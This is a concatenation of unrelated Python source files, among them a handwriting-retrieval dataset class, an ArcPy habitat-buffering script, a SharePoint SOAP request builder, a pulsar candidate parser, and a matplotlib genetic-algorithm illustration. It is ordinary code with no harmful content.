prec_at_k = (labels[ranking] == labels).float().cumsum(dim=0) / torch.arange(1, num_docs + 1).unsqueeze(
0).t()
rel_k = (labels[ranking] == labels).float() # mask for filtering the relevant documents
ap = (prec_at_k * rel_k).sum(dim=0) / num_rel_docs_per_label
result[m]["mAP"] = (ap.sum() / num_docs).item()
return result
class WriterItem(torch.utils.data.Dataset):
"""Custom PyTorch Dataset representing a single handwritten page image
that can consist of multiple image patches (as extracted during preprocessing)"""
def __init__(self, img_dir, label, img_extension="jpg", transform=None):
"""
Args:
img_dir: Directory containing the page image or image patches
label: Respective label
img_extension (optional): File extension/type of the images
transform (optional): Transformation to be applied
"""
self.img_dir = img_dir
self.label = label
self.img_extension = img_extension
self.transform = transform
self.img_paths = sorted(glob.glob(os.path.join(img_dir, "*." + self.img_extension)))
def __len__(self):
return len(self.img_paths)
def __getitem__(self, idx):
img_path = self.img_paths[idx]
img = Image.open(img_path)
if self.transform:
img = self.transform(img)
# expand single channel images to three channels (needed by model)
if img.shape[0] == 1:
img = img.expand(3, -1, -1)
return img, self.label
|
996,674 | f6b0a4d6519c3b488bd967f4ab8a0e36558b1092 | """Extract subject-question-answer triples from 20 Questions game HITs.
See ``python extractquestions.py --help`` for more information.
"""
import collections
import json
import logging
import click
from scripts import _utils
logger = logging.getLogger(__name__)
# main function
@click.command(
context_settings={
'help_option_names': ['-h', '--help']
})
@click.argument(
'xml_dir',
type=click.Path(exists=True, file_okay=False, dir_okay=True))
@click.argument(
'output_path',
type=click.Path(exists=False, file_okay=True, dir_okay=False))
def extractquestions(xml_dir, output_path):
"""Extract questions from XML_DIR and write to OUTPUT_PATH.
Extract all unique subject-question-answer triples from a batch of
20 Questions HITs. XML_DIR should be the XML directory of one of
the 20 Questions HIT batches, extracted with AMTI. OUTPUT_PATH is
the location to which the data will be written.
"""
# submissions : the form data submitted from the twentyquestions
# HITs as a list of dictionaries mapping the question identifiers
# to the free text, i.e.:
#
# [{'gameRoomJson': game_room_json_string}, ...]
#
submissions = _utils.extract_xml_dir(xml_dir)
# extract the rows from the game room jsons
row_strs = set()
for submission in submissions:
data = json.loads(submission['gameRoomJson'])
# generate all the subject-question-answer triples created
# during the game.
subject = data['game']['round']['subject']
for questionAndAnswer in data['game']['round']['questionAndAnswers']:
# use an OrderedDict so the keys appear in the right order
# in the JSON.
row = collections.OrderedDict([
('subject', subject),
('question', questionAndAnswer['question']['questionText']),
('answer', questionAndAnswer['answer']['answerValue'])
])
row_strs.add(json.dumps(row))
# write out the data
with click.open_file(output_path, 'w') as output_file:
output_file.write('\n'.join(sorted(row_strs)))
if __name__ == '__main__':
extractquestions()
|
996,675 | d6e6c64dc1c42cd694ce2f871d4d7fffcdb5f246 | import redis_mover
redis_mover.start()
|
996,676 | 0be73d1b4ccf305ff2c3af24c7984ec79fa5a9ca | import time
from websocket import create_connection
import cv2
import numpy as np
from collections import deque
ws = create_connection("ws://127.0.0.1:1234/")
cap = cv2.VideoCapture(0)
pts = deque(maxlen=10)
Lower_green = np.array([110, 50, 50])
Upper_green = np.array([130, 255, 255])
while True:
ret, img = cap.read()
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
kernel = np.ones((3, 3), np.uint8)
mask = cv2.inRange(hsv, Lower_green, Upper_green)
mask = cv2.erode(mask, kernel, iterations=2)
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)
# mask=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel)
mask = cv2.dilate(mask, kernel, iterations=1)
res = cv2.bitwise_and(img, img, mask=mask)
cnts, heir = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2:]
center = None
if len(cnts) > 0:
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
try:
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
except:
continue
if radius > 5:
cv2.circle(img, (int(x), int(y)), int(radius), (0, 255, 255), 2)
cv2.circle(img, center, 5, (0, 0, 255), -1)
pts.appendleft(center)
for i in range(1, len(pts)):
if pts[i - 1] is None or pts[i] is None:
continue
if (not pts[1] is None and not pts[-1] is None):
size_x = pts[1][0] - pts[-1][0]
size_y = pts[1][1] - pts[-1][1]
print(size_y,"aaaa")
if size_x > 250 and size_y < 250:
ws.send("1")
pts.clear()
time.sleep(0.3)
break;
elif size_x < -250 and size_y > -250:
ws.send("-1")
pts.clear()
time.sleep(0.3)
break;
elif size_y < -250 and size_x > -250:
ws.send("0")
print("0")
pts.clear()
time.sleep(0.3)
break;
elif size_x < 250 and size_y > 250:
print("-0")
ws.send("-0")
pts.clear()
time.sleep(0.3)
break;
ws.close()
|
996,677 | 692184990b7b3cf751260a867a3558d85bd80d53 | import yaml,sys,os
sys.path.append(os.getcwd())
def get_data():
data_list = []
with open('G/web/Data/login_data.yaml','r',encoding='utf-8') as f:
readdata = f.read()
data = yaml.load(readdata).get("data")
print(data)
for i in data:
for o in i.keys():
data_list.append((i.get(o).get('uname'),i.get(o).get('pwd')))
return data_list
|
996,678 | e7cda37573525634c2975e52b07ee6491339b895 | class Solution(object):
def pivotIndex(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
soln_arr = []
for i, val in enumerate(nums):
lsum = self.calcSum(nums, 0, i)
rsum = self.calcSum(nums, i+1, len(nums))
if lsum == rsum:
soln_arr.append(i)
if len(soln_arr):
return soln_arr.pop(0)
else:
return -1
def calcSum(self, arr, start, end):
sum = 0
for x in range(start, end):
sum += arr[x]
return sum
|
996,679 | 678ef9db58d74fdb9627b1cbd845e58836698e5a | import arcpy
import os
# A1 AND A2 ZONES - DATA CLEANING
# workspace
tempgdb = r"C:\Users\rithi\Downloads\Thesis\Workspace\scratch\B2.gdb" # CHANGE
gdb = r"C:\Users\rithi\Downloads\Thesis\Workspace\BGI_invest.gdb"
arcpy.env.overwriteOutput = True
arcpy.env.workspace = gdb
# checkout spatial extension
arcpy.CheckExtension('Spatial')
arcpy.CheckOutExtension("Spatial")
habitatLayer = "B1_Intertidal" # CHANGE
biobands = ["BARN", "BLMU", "BIOF", "BRBA", "EELG", "FFRA", "GRAL", "ROCK", "SAMB", "SOBK"] # CHANGE
splashBiobands = ["BLLI", "LICH", "WHLI"]
# cleaning layers
for bioband in biobands:
featurelyr = arcpy.MakeFeatureLayer_management(habitatLayer, habitatLayer + 'lyr')
xpr1 = 'BioBand_'+ bioband + " " + "= 'C'"
arcpy.SelectLayerByAttribute_management(featurelyr, "NEW_SELECTION", "{}".format(xpr1))
xpr1 = 'BioBand_' + bioband + " " + "= 'P' AND " + "BioBand_" + bioband + "_PCV" + " " + "= '26-50'" + " " + "AND" + " " + "BioBand_" + bioband + "_L" + " " + "= '>95'"
print(xpr1)
arcpy.SelectLayerByAttribute_management(featurelyr, "ADD_TO_SELECTION", "{}".format(xpr1))
arcpy.CopyFeatures_management(featurelyr, tempgdb + "\clean" + bioband)
# setting new workspace and list variables
arcpy.env.workspace = tempgdb
print("setting up buffer workspace")
shapes = ["cleanBARN", "cleanBLMU", "cleanBIOF", "cleanBRBA", "cleanEELG", "cleanFFRA", "cleanGRAL", "cleanROCK", "cleanSAMB", "cleanSOBK"] # CHANGE
biobands = ["BARN", "BLMU", "BIOF", "BRBA", "EELG", "FFRA", "GRAL", "ROCK", "SAMB", "SOBK"] # CHANGE
# make a list of all the LEFT and RIGHT unit identifiers
fcL = r'C:\Users\rithi\Downloads\Thesis\Workspace\BGI_invest.gdb\UnitLines_LEFT'
fcR = r'C:\Users\rithi\Downloads\Thesis\Workspace\BGI_invest.gdb\UnitLines_RIGHT'
fields = ['Unit_lines_PHY_IDENT']
ids_LEFT = []
ids_RIGHT = []
with arcpy.da.SearchCursor(fcL, fields) as cursor:
for row in cursor:
ids_LEFT.append(row[0])
with arcpy.da.SearchCursor(fcR, fields) as cursor:
for row in cursor:
ids_RIGHT.append(row[0])
for shape in shapes:
for bioband in biobands:
arcpy.AddField_management(shape, "buffer_dist", "FLOAT", "")
arcpy.AddField_management(shape, "buffer_dir", "TEXT", "")
cursorCurrent = arcpy.UpdateCursor(shape)
# add buffer distance
for row in cursorCurrent:
if row.getValue('BioBand_' + bioband) == 'M':
row.setValue("buffer_dist", 3)
elif row.getValue('BioBand_' + bioband) == 'm':
row.setValue("buffer_dist", 3)
elif row.getValue('BioBand_' + bioband) == 'N':
row.setValue("buffer_dist", 0.5)
elif row.getValue('BioBand_' + bioband) == 'n':
row.setValue("buffer_dist", 0.5)
elif row.getValue('BioBand_' + bioband) == 'W':
row.setValue("buffer_dist", 7.5)
elif row.getValue('BioBand_' + bioband) == 'w':
row.setValue("buffer_dist", 7.5)
elif row.getValue('BioBand_' + bioband+"_PCV") == '<5':
row.setValue("buffer_dist", 0.05* 40)
elif row.getValue('BioBand_' + bioband+"_PCV") == '5-25':
row.setValue("buffer_dist", 0.15 * 40)
elif row.getValue('BioBand_' + bioband+"_PCV") == '26-50':
row.setValue("buffer_dist", 0.38 * 40)
elif row.getValue('BioBand_' + bioband + "_PCV") == '51-75':
row.setValue("buffer_dist", 0.63 * 40)
elif row.getValue('BioBand_' + bioband + "_PCV") == '76-95':
row.setValue("buffer_dist", 0.855 * 40)
elif row.getValue('BioBand_' + bioband + "_PCV") == '>95':
row.setValue("buffer_dist", 40)
if row.getValue('Unit_lines_PHY_IDENT') in ids_LEFT:
row.setValue("buffer_dir", "LEFT")
elif row.getValue('Unit_lines_PHY_IDENT') in ids_RIGHT:
row.setValue("buffer_dir", "RIGHT")
else:
row.setValue("buffer_dir", "RIGHT")
cursorCurrent.updateRow(row)
print("buffer direction and distance fields set")
# delete cursor
cursorCurrent=cursorCurrent=None
# split into left buffer and right unit shapefiles
for shape in shapes:
featurelyr = arcpy.MakeFeatureLayer_management(shape, shape + 'lyr1')
xpr1 = "buffer_dir = 'LEFT'"
arcpy.SelectLayerByAttribute_management(featurelyr, "NEW_SELECTION", "{}".format(xpr1))
arcpy.CopyFeatures_management(featurelyr, shape + "LEFT")
featurelyr = arcpy.MakeFeatureLayer_management(shape, shape + 'lyr2')
xpr1 = "buffer_dir = 'RIGHT'"
arcpy.SelectLayerByAttribute_management(featurelyr, "NEW_SELECTION", "{}".format(xpr1))
arcpy.CopyFeatures_management(featurelyr, shape + "RIGHT")
# Add buffers and merge into final sub-zone polygons
for shape in shapes:
arcpy.Buffer_analysis(shape + "LEFT", shape + "LEFT_B", "buffer_dist", "LEFT", "FLAT", "", "", "GEODESIC")
arcpy.Buffer_analysis(shape + "RIGHT", shape + "RIGHT_B", "buffer_dist", "RIGHT", "FLAT", "", "", "GEODESIC")
# manually move left and right units according to Zone location
# uncomment the following lines, comment everythign else above'
#
# import arcpy
# tempgdb = r"C:\Users\rithi\Downloads\Thesis\Workspace\scratch\B2.gdb" # CHANGE
# arcpy.env.overwriteOutput = True
# arcpy.env.workspace = tempgdb
# arcpy.CheckExtension('Spatial')
# arcpy.CheckOutExtension("Spatial")
#
# shapes = ["cleanBARN", "cleanBLMU", "cleanBIOF", "cleanBRBA", "cleanEELG", "cleanFFRA", "cleanGRAL", "cleanROCK", "cleanSAMB", "cleanSOBK"] # CHANGE
# biobands = ["BARN", "BLMU", "BIOF", "BRBA", "EELG", "FFRA", "GRAL", "ROCK", "SAMB", "SOBK"] # CHANGE
#
#
# for shape in shapes:
# minputs = [shape + "LEFT_B", shape + "RIGHT_B"]
# arcpy.Merge_management(minputs, shape+"_B2P") # CHANGE
arcpy.CheckInExtension("Spatial")
|
996,680 | d4d1f6d79cc4dedd4a3c475077bc29c89d140e90 | import re
import xml.etree.cElementTree as ET
import numpy
################################################################################
def readDataBlock(xmlnode):
""" Turn any 'DataBlock' XML node into a numpy array of floats
"""
vmin = float(xmlnode.get('min'))
vmax = float(xmlnode.get('max'))
string = xmlnode.text
string = re.sub("[\t\s\n]", "", string)
data = numpy.asarray(
bytearray.fromhex(string),
dtype = float
)
return data * (vmax - vmin) / 255. + vmin
class Candidate(object):
def __init__(self, fname):
""" Build a new Candidate object from a PHCX file path.
"""
xmlroot = ET.parse(fname).getroot()
# Read CentreFreq and BandWidth
coordNode = xmlroot.find('head')
self.fc = float(coordNode.find('CentreFreq').text)
self.bw = float(coordNode.find('BandWidth').text)
# Get PDMP section
for section in xmlroot.findall('Section'):
if 'pdmp' in section.get('name').lower():
opt_section = section
# Best values as returned by PDMP
opt_values = {
node.tag : float(node.text)
for node in opt_section.find('BestValues').getchildren()
}
self.bary_period = opt_values['BaryPeriod']
self.dm = opt_values['Dm']
self.snr = opt_values['Snr']
self.width = opt_values['Width']
### Sub-Integrations
subintsNode = opt_section.find('SubIntegrations')
self.nsubs = int(subintsNode.get('nSub'))
nsubs_subints = int(subintsNode.get('nSub'))
self.nbins = int(subintsNode.get('nBins'))
nbins_subints = int(subintsNode.get('nBins'))
self.subints = readDataBlock(subintsNode).reshape(nsubs_subints, nbins_subints)
### Profile
profileNode = opt_section.find('Profile')
self.profile = readDataBlock(profileNode)
self.nbins_profile = int(profileNode.get('nBins'))
################################################################################
if __name__ == '__main__':
import os
# Load example.phcx file (must be in the same directory as this python script)
directory, fname = os.path.split(
os.path.abspath(__file__)
)
cand = Candidate(
os.path.join(directory, 'example.phcx')
)
|
996,681 | 0902a3e01e5d32dcb22507ad8afe6f8d0fb77d6e | from copy import copy
import operator
import typing
from interval_search import binary_search
from .._HereditaryStratum import HereditaryStratum
from ._detail import HereditaryStratumOrderedStoreBase
class HereditaryStratumOrderedStoreList(HereditaryStratumOrderedStoreBase):
"""Interchangeable backing container for HereditaryStratigraphicColumn.
Stores deposited strata using a list implementation. Retained strata are
stored from most ancient (index 0, front) to most recent (back). Cloned
stores instantiate an independent list (although strata are not deepcopied
themselves).
Potentially useful in scenarios where moderate strata counts are retained,
many strata are deposited without column cloning, deleted strata tend to
be more recent (i.e., not more ancient and toward the front of the list),
or many comparisons to estimate most recent common ancestor are made
between stratigraphic columns.
"""
__slots__ = ("_data",)
# strata stored from most ancient (index 0, front) to most recent (back)
_data: typing.List[HereditaryStratum]
def __init__(self: "HereditaryStratumOrderedStoreList"):
"""Initialize instance variables."""
self._data = []
def __eq__(
self: "HereditaryStratumOrderedStoreList",
other: "HereditaryStratumOrderedStoreList",
) -> bool:
"""Compare for value-wise equality."""
# adapted from https://stackoverflow.com/a/4522896
return (
isinstance(
other,
self.__class__,
)
and self.__slots__ == other.__slots__
and all(
getter(self) == getter(other)
for getter in [
operator.attrgetter(attr) for attr in self.__slots__
]
)
)
def DepositStratum(
self: "HereditaryStratumOrderedStoreList",
rank: typing.Optional[int],
stratum: "HereditaryStratum",
) -> None:
"""Insert a new stratum into the store.
Parameters
----------
rank : typing.Optional[int]
The position of the stratum being deposited within the sequence of strata deposited into the column. Precisely, the number of strata that have been deposited before stratum.
stratum : HereditaryStratum
The stratum to deposit.
"""
self._data.append(stratum)
def GetNumStrataRetained(self: "HereditaryStratumOrderedStoreList") -> int:
"""How many strata are present in the store?
May be fewer than the number of strata deposited if deletions have
occured.
"""
return len(self._data)
def GetStratumAtColumnIndex(
self: "HereditaryStratumOrderedStoreList",
index: int,
# needed for other implementations
get_rank_at_column_index: typing.Optional[typing.Callable] = None,
) -> HereditaryStratum:
"""Get the stratum positioned at index i among retained strata.
Index order is from most ancient (index 0) to most recent.
Parameters
----------
ranks : iterator over int
The ranks that to be deleted.
get_column_index_of_rank : callable, optional
Callable that returns the index position within retained strata of
the stratum deposited at rank r.
"""
return self._data[index]
def GetRankAtColumnIndex(
self: "HereditaryStratumOrderedStoreList",
index: int,
) -> int:
"""Map from deposition generation to column position.
What is the deposition rank of the stratum positioned at index i
among retained strata? Index order is from most ancient (index 0) to
most recent.
"""
res_rank = self.GetStratumAtColumnIndex(index).GetDepositionRank()
assert res_rank is not None
return res_rank
def GetColumnIndexOfRank(
self: "HereditaryStratumOrderedStoreList",
rank: int,
) -> typing.Optional[int]:
"""Map from column position to deposition generation
What is the index position within retained strata of the stratum
deposited at rank r? Returns None if no stratum with rank r is present
within the store.
"""
if self.GetNumStrataRetained() == 0:
return None
else:
res_idx = binary_search(
lambda idx: self.GetRankAtColumnIndex(idx) >= rank,
0,
self.GetNumStrataRetained() - 1,
)
if res_idx is None:
return None
elif self.GetRankAtColumnIndex(res_idx) == rank:
return res_idx
else:
return None
def DelRanks(
self: "HereditaryStratumOrderedStoreList",
ranks: typing.Iterator[int],
# deposition ranks might not be stored in strata
get_column_index_of_rank: typing.Optional[typing.Callable] = None,
) -> None:
"""Purge strata with specified deposition ranks from the store.
Parameters
----------
ranks : iterator over int
The ranks that to be deleted.
get_column_index_of_rank : callable, optional
Callable that returns the deposition rank of the stratum positioned
at index i among retained strata.
"""
if get_column_index_of_rank is None:
get_column_index_of_rank = self.GetColumnIndexOfRank
indices = [get_column_index_of_rank(rank) for rank in ranks]
# adapted from https://stackoverflow.com/a/11303234/17332200
# iterate over indices in reverse order to prevent invalidation
# reversed() is an potential optimization
# given indices is assumed to be in ascending order
for index in sorted(reversed(indices), reverse=True):
assert index is not None
del self._data[index]
def IterRetainedRanks(
self: "HereditaryStratumOrderedStoreList",
) -> typing.Iterator[int]:
"""Iterate over deposition ranks of strata present in the store from
most ancient to most recent.
The store may be altered during iteration without iterator
invalidation, although subsequent updates will not be reflected in the
iterator.
"""
# must make copy to prevent invalidation when strata are deleted
# note, however, that copy is made lazily
# (only when first item requested)
ranks = [stratum.GetDepositionRank() for stratum in self._data]
for rank in ranks:
assert rank is not None
yield rank
def IterRetainedStrata(
self: "HereditaryStratumOrderedStoreList",
) -> typing.Iterator[HereditaryStratum]:
"""Iterate over stored strata from most ancient to most recent."""
yield from self._data
def IterRankDifferentiaZip(
self: "HereditaryStratumOrderedStoreList",
# deposition ranks might not be stored in strata
get_rank_at_column_index: typing.Optional[typing.Callable] = None,
start_column_index: int = 0,
) -> typing.Iterator[typing.Tuple[int, int]]:
"""Iterate over differentia and corresponding deposition ranks.
Values yielded as tuples. Guaranteed ordered from most ancient to most
recent.
Parameters
----------
get_rank_at_column_index : callable, optional
Callable that returns the deposition rank of the stratum positioned
at index i among retained strata.
start_column_index : callable, optional
Number of strata to skip over before yielding first result from the
iterator. Default 0, meaning no strata are skipped over.
"""
if get_rank_at_column_index is None:
get_rank_at_column_index = self.GetRankAtColumnIndex
# adapted from https://stackoverflow.com/a/12911454
for index in range(start_column_index, len(self._data)):
stratum = self._data[index]
yield (get_rank_at_column_index(index), stratum.GetDifferentia())
def Clone(
self: "HereditaryStratumOrderedStoreList",
) -> "HereditaryStratumOrderedStoreList":
"""Create an independent copy of the store.
Returned copy contains identical data but may be freely altered without
affecting data within this store.
"""
# shallow copy
result = copy(self)
# do semi-shallow clone on select elements
# see https://stackoverflow.com/a/47859483 for performance consierations
result._data = [*self._data]
return result
|
996,682 | 1f8d9bcc154ad2e4d0a0929fefca509f781a7e01 | from typing import Dict
from typing import List
from typing import Optional
from lxml import etree
# TODO: Port to defusedxml to satisfy Bandit
# import defusedxml.ElementTree as etree
class Soap:
"""A simple class for building SOAP Requests"""
def __init__(self, command): # type: (str) -> None
self.envelope = None
self.command = command
self.request = None
self.updates = None
self.batch = None
# HEADER GLOBALS
SOAPENV_NAMESPACE = "http://schemas.xmlsoap.org/soap/envelope/"
SOAPENV = "{%s}" % SOAPENV_NAMESPACE
ns0_NAMESPACE = "http://schemas.xmlsoap.org/soap/envelope/"
ns1_NAMESPACE = "http://schemas.microsoft.com/sharepoint/soap/"
xsi_NAMESPACE = "http://www.w3.org/2001/XMLSchema-instance"
NSMAP = {"SOAP-ENV": SOAPENV_NAMESPACE, "ns0": ns0_NAMESPACE, "ns1": ns1_NAMESPACE, "xsi": xsi_NAMESPACE}
# Create Header
self.envelope = etree.Element(SOAPENV + "Envelope", nsmap=NSMAP)
HEADER = etree.SubElement(self.envelope, "{http://schemas.xmlsoap.org/soap/envelope/}Body")
# Create Command
self.command = etree.SubElement(HEADER, "{http://schemas.microsoft.com/sharepoint/soap/}" + command)
self.start_str = b"""<?xml version="1.0" encoding="utf-8"?>"""
def add_parameter(self, parameter, value=None):
# type: (str, Optional[str]) -> None
sub = etree.SubElement(self.command, "{http://schemas.microsoft.com/sharepoint/soap/}" + parameter)
if value:
sub.text = value
# UpdateListItems Method
def add_actions(self, data, kind):
# type: (List[Dict[str, str]], str) -> None
if not self.updates:
updates = etree.SubElement(self.command, "{http://schemas.microsoft.com/sharepoint/soap/}updates")
self.batch = etree.SubElement(updates, "Batch")
self.batch.set("OnError", "Return")
self.batch.set("ListVersion", "1")
if kind == "Delete":
for index, _id in enumerate(data, 1):
method = etree.SubElement(self.batch, "Method")
method.set("ID", str(index))
method.set("Cmd", kind)
field = etree.SubElement(method, "Field")
field.set("Name", "ID")
field.text = str(_id)
else:
for index, row in enumerate(data, 1):
method = etree.SubElement(self.batch, "Method")
method.set("ID", str(index))
method.set("Cmd", kind)
for key, value in row.items():
field = etree.SubElement(method, "Field")
field.set("Name", key)
field.text = str(value)
# GetListFields Method
def add_view_fields(self, fields):
# type: (List[str]) -> None
viewFields = etree.SubElement(self.command, "{http://schemas.microsoft.com/sharepoint/soap/}viewFields")
viewFields.set("ViewFieldsOnly", "true")
ViewFields = etree.SubElement(viewFields, "ViewFields")
for field in fields:
view_field = etree.SubElement(ViewFields, "FieldRef")
view_field.set("Name", field)
# GetListItems Method
def add_query(self, pyquery):
# type: (Dict) -> None
query = etree.SubElement(self.command, "{http://schemas.microsoft.com/sharepoint/soap/}query")
Query = etree.SubElement(query, "Query")
if "OrderBy" in pyquery:
order = etree.SubElement(Query, "OrderBy")
for field in pyquery["OrderBy"]:
fieldref = etree.SubElement(order, "FieldRef")
if type(field) == tuple:
fieldref.set("Name", field[0])
if field[1] == "DESCENDING":
fieldref.set("Ascending", "FALSE")
else:
fieldref.set("Name", field)
if "GroupBy" in pyquery:
order = etree.SubElement(Query, "GroupBy")
for field in pyquery["GroupBy"]:
fieldref = etree.SubElement(order, "FieldRef")
fieldref.set("Name", field)
if "Where" in pyquery:
Query.append(pyquery["Where"])
def __repr__(self): # type: () -> str
return (self.start_str + etree.tostring(self.envelope)).decode("utf-8")
def __str__(self, pretty_print=False): # type: (bool) -> str
return (self.start_str + etree.tostring(self.envelope, pretty_print=True)).decode("utf-8")
|
996,683 | b690fedb671164352d84ba72fb894315bbd11f54 | """
La funcion "crear_mazo_cartas_poker" esta incompleta y necesita ser completada para
devolver una lista de diccionarios con todas las cartas disponibles en un mazo de poker.
Nota: El ejercicio 041* ya muestra una función similar que puede usarse como ayuda
* https://github.com/avdata99/programacion-para-no-programadores/blob/master/ejercicios/ejercicio-041/ejercicio.py
"""
def crear_mazo_cartas_poker():
palos = ['pica', 'trebol', 'corazon', 'diamante']
mazo = []
# COMPLETAR la lista con un diccionario por cada carta de
# la forma {'numero': X, 'palo': Y}
# El test de la parte inferior de este archivo ayuda a validar
# el resultado esperado
return mazo
# ------------------------------------------------------------------------
# NO BORRAR O MODIFICAR LAS LINEAS QUE SIGUEN
# ------------------------------------------------------------------------
# Una vez terminada la tarea ejecutar este archivo.
# Si se ve la leyenda 'Ejercicio terminado OK' el ejercicio se considera completado.
# La instruccion "assert" de Python lanzará un error si lo que se indica a
# continuacion es falso.
# Si usas GitHub (o similares) podes hacer una nueva rama con esta solución,
# crear un "pull request" y solicitar revision de un tercero.
mazo_poker = crear_mazo_cartas_poker()
assert {'numero': 9, 'palo': 'pica'} in mazo_poker
assert {'numero': 10, 'palo': 'pica'} in mazo_poker
assert {'numero': 'J', 'palo': 'pica'} in mazo_poker
assert {'numero': 'Q', 'palo': 'pica'} in mazo_poker
assert {'numero': 'K', 'palo': 'pica'} in mazo_poker
assert {'numero': 9, 'palo': 'diamante'} in mazo_poker
assert {'numero': 10, 'palo': 'diamante'} in mazo_poker
assert {'numero': 'J', 'palo': 'diamante'} in mazo_poker
assert {'numero': 'Q', 'palo': 'diamante'} in mazo_poker
assert {'numero': 'K', 'palo': 'diamante'} in mazo_poker
print('Ejercicio terminado OK')
|
996,684 | 1a0e318d77c4c5189826dc5ee94ddc6e88fce3cd | from .csv2WKT import Crs2WKT |
996,685 | 1f7c3d10759b1ce5c317e221fb5c5fcc56c57b30 | import matplotlib.pyplot as plt
import numpy as np
import pandas
from matplotlib.table import Table
#the_table.auto_set_font_size(False)
#the_table.set_fontsize(5.5)
npop = 8
nc = 12
grid = [[0 for x in range(nc)] for y in range(npop)]
def randomgen(high, n):
listrand = list(np.random.randint(high, size = n))
return listrand
a = randomgen(6, nc)
a
for i in range (npop):
grid[i] = randomgen(6,nc)
grid
s = 'individual'
ind = range(1,9)
ind
indname = ["individual" + ' ' + str(i) for i in ind]
indname
data = pandas.DataFrame(grid)
data.index.name = indname
data
checkerboard_table(data)
plt.show()
def main():
data = pandas.DataFrame(grid,
columns=['1','2','3','4','5','6','7','8','9','10','11','12'])
checkerboard_table(data,nc,npop)
def checkerboard_table(data,nc,npop, fmt='{:.0f}', bkg_colors=['white', 'white']):
fig, ax = plt.subplots(figsize=(nc*0.8,npop*0.8))
ax.set_axis_off()
ax.set_xlabel('Population')
tb = Table(ax)
tb.auto_set_font_size(False)
tb.set_fontsize(14)
nrows, ncols = data.shape
width, height = 1.0 / ncols, 1.0 / nrows
# Add cells
for (i,j), val in np.ndenumerate(data):
# Index either the first or second item of bkg_colors based on
# a checker board pattern
idx = 0 if val == 1 else 1
color = bkg_colors[idx]
tb.add_cell(i, j, width, height, text=fmt.format(val),
loc='center', facecolor=color)
# Row Labels...
for i, label in enumerate(data.index):
tb.add_cell(i, -1, width, height, text="individual" + ' ' + str(label + 1), loc='right',
edgecolor='none', facecolor='none')
# Column Labels...
for j, label in enumerate(data.columns):
tb.add_cell(-1, j, width, height/2, text=label, loc='center',
edgecolor='none', facecolor='none')
ax.add_table(tb)
plt.savefig("pop1.pdf",dpi=100)
return fig
if __name__ == '__main__':
main()
############
def checkerboard_table(data,nc,npop,indexname, fmt='{:.0f}', bkg_colors=['yellow', 'white']):
fig, ax = plt.subplots(figsize=(nc*1.5,npop*1.5))
ax.set_axis_off()
ax.set_xlabel('Population')
tb = Table(ax)
tb.auto_set_font_size(False)
tb.set_fontsize(14)
nrows, ncols = data.shape
width, height = 1.0 / ncols, 1.0 / nrows
# Add cells
for (i,j), val in np.ndenumerate(data):
# Index either the first or second item of bkg_colors based on
# a checker board pattern
idx = 0 if val ==1 else 1
color = bkg_colors[idx]
tb.add_cell(i, j, width, height, text=fmt.format(val),
loc='center', facecolor=color)
# Row Labels...
for i, label in enumerate(data.index):
tb.add_cell(i, -1, width, height, text= indexname + ' ' + str(label + 1), loc='right',
edgecolor='none', facecolor='none')
# Column Labels...
for j, label in enumerate(data.columns):
tb.add_cell(-1, j, width, height/2, text=label, loc='center',
edgecolor='none', facecolor='none')
ax.add_table(tb)
#plt.savefig("hk.pdf")
return fig
data = pandas.DataFrame(grid, columns=['1','2','3','4','5','6','7','8','9','10','11','12'])
dataselect = data.loc[[0,5], :]
dataselect
checkerboard_table(dataselect, nc = 12, npop=2)
plt.show()
dataselectcrossover = dataselect.copy()
dataselectcrossover
ind1 = dataselect.iloc[0,:]
ind2 = dataselect.iloc[1,:]
ind2
ind1
ind1[11]
crossind1 = np.copy(ind1)
crossind2 = np.copy(ind2)
crossind1
crossind1 [6:12] = np.copy(ind2[6:12])
crossind1
ind1
crossind2 [6:12] = np.copy(ind1[6:12])
crossind2
ind2
ind1
crossind1
crossind2
datanew = pandas.DataFrame(crossind1,crossind2)
datanew
dataselectcrossover.iloc[0,:] = np.copy(crossind1)
dataselectcrossover.iloc[1,:] = np.copy(crossind2)
dataselectcrossover
dataselect
checkerboard_table(dataselectcrossover, nc = 12, npop=2, indexname = "Individual")
datamutate = dataselectcrossover.copy()
datamutate
datamutate.iloc[0, 10] = 0
datamutate
checkerboard_table(dataselect, nc = 12, npop=2, indexname = "Parent")
checkerboard_table(dataselectcrossover, nc = 12, npop=2, indexname = "Child")
fig.savefig("cross.pdf")
fig.show()
checkerboard_table(dataselect, nc = 12, npop=2,indexname = "Parent")
checkerboard_table(dataselectcrossover, nc = 12, npop=2, indexname = "Child")
checkerboard_table(datamutate, nc = 12, npop=2, indexname = "Child")
dataselectcrossover
def checkerboard_table(data,nc,npop, indexname, fmt='{:.0f}', bkg_colors=['white', 'white']):
fig, ax = plt.subplots(figsize=(nc*1.5,npop*1.5))
ax.set_axis_off()
ax.set_xlabel('Population')
tb = Table(ax)
tb.auto_set_font_size(False)
tb.set_fontsize(20)
nrows, ncols = data.shape
width, height = 1.0 / ncols, 1.0 / nrows
# Add cells
for (i,j), val in np.ndenumerate(data):
# Index either the first or second item of bkg_colors based on
# a checker board pattern
idx = 0 if val == 1 else 1
color = bkg_colors[idx]
tb.add_cell(i, j, width, height, text=fmt.format(val),
loc='center', facecolor=color)
# Row Labels...
for i, label in enumerate(data.index):
tb.add_cell(i, -1, width, height, text= indexname + ' ' + str(i+1), loc='right',
edgecolor='none', facecolor='none')
# Column Labels...
for j, label in enumerate(data.columns):
tb.add_cell(-1, j, width, height/2, text=label, loc='center',
edgecolor='none', facecolor='none')
ax.add_table(tb)
#plt.savefig("hk.pdf")
return fig
checkerboard_table(data= dataselect,nc = 12, npop = 2, indexname = 'Individual')
plt.savefig("parent1.png")
checkerboard_table(data= dataselectcrossover,nc = 12, npop = 2, indexname = 'Offspring')
plt.savefig("crossover.png")
checkerboard_table(data= datamutate,nc = 12, npop = 2, indexname = 'Offspring')
plt.savefig("mutate.png")
plt.show()
def generategraph(file, idx):
savefile = file + str(idx) + '.png' # file might need to be replaced by a string
plt.savefig(savefile)
plt.show() # place after plt.savefig()
for idx, fil in enumerate(files):
